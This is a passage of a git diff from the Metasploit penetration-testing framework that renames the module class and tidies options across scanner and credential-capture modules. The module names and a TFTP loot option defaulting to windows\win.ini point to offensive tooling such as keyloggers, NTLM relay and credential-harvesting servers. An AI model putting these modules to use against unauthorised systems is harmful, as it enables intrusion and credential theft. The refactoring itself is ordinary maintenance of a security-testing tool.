Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb index b6af840661..116f8f6752 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index 2facedd4f1..b7d336428a 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index 63dda3f8ab..3365467533 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/telnet' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb index a23e6058ef..de3d1de097 100644 --- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb +++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb index 644a178b89..3ec68ab891 100644 --- a/modules/auxiliary/scanner/telnet/telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/telnet_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb index dc1e190457..21b13ad5ce 100644 --- a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb +++ b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(69), OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']), - OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false']) + OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false]) ], self.class) end diff --git a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb index fd8c131316..eaef1b8f21 100644 --- a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb +++ b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index 29935dc352..3012f9401c 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/udp_scanner_template.rb b/modules/auxiliary/scanner/udp_scanner_template.rb index 07ec5c659d..8253611195 100644 --- a/modules/auxiliary/scanner/udp_scanner_template.rb +++ b/modules/auxiliary/scanner/udp_scanner_template.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/upnp/ssdp_amp.rb b/modules/auxiliary/scanner/upnp/ssdp_amp.rb index 5d2217308d..b5854af7e8 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_amp.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 0f7496a036..99777f99e4 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb index 0cc62c9a60..753d309f50 100644 --- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb +++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmauthd_login.rb b/modules/auxiliary/scanner/vmware/vmauthd_login.rb index 5844222e6c..abcdea7cb2 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_login.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_login.rb @@ -7,7 +7,7 @@ require 'msf/core/exploit/tcp' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/vmauthd' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vmware/vmauthd_version.rb b/modules/auxiliary/scanner/vmware/vmauthd_version.rb index 28b6355385..abf0cd7665 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_version.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_version.rb @@ -5,7 +5,7 @@ require 'msf/core/exploit/tcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb index d8bb09b6c5..39061893e6 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb index 3cd4b3563a..262d2304ee 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb index 8189a9b495..bc937bd926 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb index 45081e5019..0692fdb880 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_host_details.rb b/modules/auxiliary/scanner/vmware/vmware_host_details.rb index cd4cfb164c..e7929fed49 100644 --- a/modules/auxiliary/scanner/vmware/vmware_host_details.rb +++ b/modules/auxiliary/scanner/vmware/vmware_host_details.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb index 0225eddd6e..36fc06096a 100644 --- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb +++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index de4f89435f..72caad0ee1 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb index 68e1922d5e..52f6bd5fd2 100644 --- a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb +++ b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb index 600db46d77..3e9cc9e5fd 100644 --- a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb +++ b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index 91ec122893..22f1f22341 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -8,7 +8,7 @@ require 'rex/proto/rfb' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/vnc' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index e16a345997..a787e463f7 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/rfb' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index 0f4fe85d52..726c055267 100644 --- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'fileutils' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::IAX2 diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb index 88914a5525..8a9f4a5c1f 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb index 655bfbf00b..b2e2a25df1 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb index 05b76dd142..5a946de15a 100644 --- a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb +++ b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index a4ce2652f7..73639a55bb 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -9,7 +9,7 @@ require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 1871aa59d1..8b651e1935 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -10,7 +10,7 @@ require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner' require 'metasploit/framework/login_scanner/winrm' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 7beaf89022..2705a1ce24 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index 32912c464f..1ca3590286 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/server/android_browsable_msf_launch.rb b/modules/auxiliary/server/android_browsable_msf_launch.rb index 7d603eb953..6763597f09 100644 --- a/modules/auxiliary/server/android_browsable_msf_launch.rb +++ b/modules/auxiliary/server/android_browsable_msf_launch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/modules/auxiliary/server/android_mercury_parseuri.rb b/modules/auxiliary/server/android_mercury_parseuri.rb index d152584e06..cbce29df4f 100644 --- a/modules/auxiliary/server/android_mercury_parseuri.rb +++ b/modules/auxiliary/server/android_mercury_parseuri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index 35a4fcc4cc..0ff0e253b8 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -12,7 +12,7 @@ require 'msf/core' require 'rex/exploitation/js/detect' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb index 1c28beee94..a43d870673 100644 --- a/modules/auxiliary/server/browser_autopwn2.rb +++ b/modules/auxiliary/server/browser_autopwn2.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::BrowserAutopwn2 diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 970b8cda7f..004bf01aa2 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 667eca6a4a..8d01ea4a46 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 721835e278..82118512d3 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http_basic.rb b/modules/auxiliary/server/capture/http_basic.rb index 8e8db5c2ab..5b68785373 100644 --- a/modules/auxiliary/server/capture/http_basic.rb +++ b/modules/auxiliary/server/capture/http_basic.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http_javascript_keylogger.rb b/modules/auxiliary/server/capture/http_javascript_keylogger.rb index aefe8fce9c..e6cf859bb2 100644 --- a/modules/auxiliary/server/capture/http_javascript_keylogger.rb +++ b/modules/auxiliary/server/capture/http_javascript_keylogger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 9d775d940d..04d052845c 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -13,7 +13,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 843ef0580b..979f44a84a 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/mssql.rb b/modules/auxiliary/server/capture/mssql.rb index 99885df4af..4f660f1d78 100644 --- a/modules/auxiliary/server/capture/mssql.rb +++ b/modules/auxiliary/server/capture/mssql.rb @@ -12,7 +12,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::SMB::Server diff --git a/modules/auxiliary/server/capture/mysql.rb b/modules/auxiliary/server/capture/mysql.rb index a11ff87366..aba21c66df 100644 --- a/modules/auxiliary/server/capture/mysql.rb +++ b/modules/auxiliary/server/capture/mysql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index f22877434f..92cd3a383e 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/postgresql.rb b/modules/auxiliary/server/capture/postgresql.rb index d9f11042d1..bafb8f0366 100644 --- a/modules/auxiliary/server/capture/postgresql.rb +++ b/modules/auxiliary/server/capture/postgresql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/printjob_capture.rb b/modules/auxiliary/server/capture/printjob_capture.rb index 8c08bf33d4..5c6954fe81 100644 --- a/modules/auxiliary/server/capture/printjob_capture.rb +++ b/modules/auxiliary/server/capture/printjob_capture.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/server/capture/sip.rb b/modules/auxiliary/server/capture/sip.rb index 03dd3e2113..debf7c8653 100644 --- a/modules/auxiliary/server/capture/sip.rb +++ b/modules/auxiliary/server/capture/sip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/socket' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 1f3e23306a..100f800596 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::SMB::Server diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index 12769c29cb..f44de779d7 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb index d1cabac7e4..73b966de96 100644 --- a/modules/auxiliary/server/capture/telnet.rb +++ b/modules/auxiliary/server/capture/telnet.rb @@ -6,7 +6,7 @@ require 'msf/core' # Fake Telnet Service - Kris Katterjohn 09/28/2008 -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/vnc.rb b/modules/auxiliary/server/capture/vnc.rb index adf634969d..b6e6cb0121 100644 --- a/modules/auxiliary/server/capture/vnc.rb +++ b/modules/auxiliary/server/capture/vnc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/dhclient_bash_env.rb b/modules/auxiliary/server/dhclient_bash_env.rb index 1441bd48c9..edb64ec9e4 100644 --- a/modules/auxiliary/server/dhclient_bash_env.rb +++ b/modules/auxiliary/server/dhclient_bash_env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer diff --git a/modules/auxiliary/server/dhcp.rb b/modules/auxiliary/server/dhcp.rb index 65aad4275c..d25ee16e46 100644 --- a/modules/auxiliary/server/dhcp.rb +++ b/modules/auxiliary/server/dhcp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 1fda7a81a6..f4f2f3ca8f 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 88c9c5f125..695a346578 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary @log_console = false @log_database = false - if (datastore['LogConsole'].to_s.match(/^(t|y|1)/i)) + if datastore['LogConsole'] @log_console = true end - if (datastore['LogDatabase'].to_s.match(/^(t|y|1)/i)) + if datastore['LogDatabase'] @log_database = true end diff --git a/modules/auxiliary/server/ftp.rb b/modules/auxiliary/server/ftp.rb index c6bb913e8a..c47b1601e2 100644 --- a/modules/auxiliary/server/ftp.rb +++ b/modules/auxiliary/server/ftp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 285232a1fa..8110a187b5 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -15,7 +15,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML @@ -310,7 +310,7 @@ class Metasploit3 < Msf::Auxiliary else print_status("Auth successful, saving server response in database") end - vprint_status(resp) + vprint_status(resp.to_s) end return [resp, 